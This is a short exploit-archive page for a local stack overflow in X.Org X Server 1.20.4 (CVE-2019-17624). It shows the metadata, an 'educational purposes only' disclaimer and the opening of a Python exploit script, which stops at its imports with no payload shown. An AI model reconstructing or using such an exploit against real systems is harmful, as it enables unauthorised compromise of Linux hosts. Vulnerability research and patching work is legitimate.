X.org x server 1.20.4 local stack overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-10-16 |
Type : local |
Platform : linux
This exploit / vulnerability X.org x server 1.20.4 local stack overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
# Date: 2019-10-16
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Vendor Homepage: https://www.x.org/
# Version: <= 1.20.4
# Tested on: Linux
# CVE: CVE-2019-17624
#!/usr/bin/python
#coding: utf-8
# ************************************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *
# ************************************************************************
import sys, time
import ctypes as ct
from ctypes import cast
from ctypes.util import find_library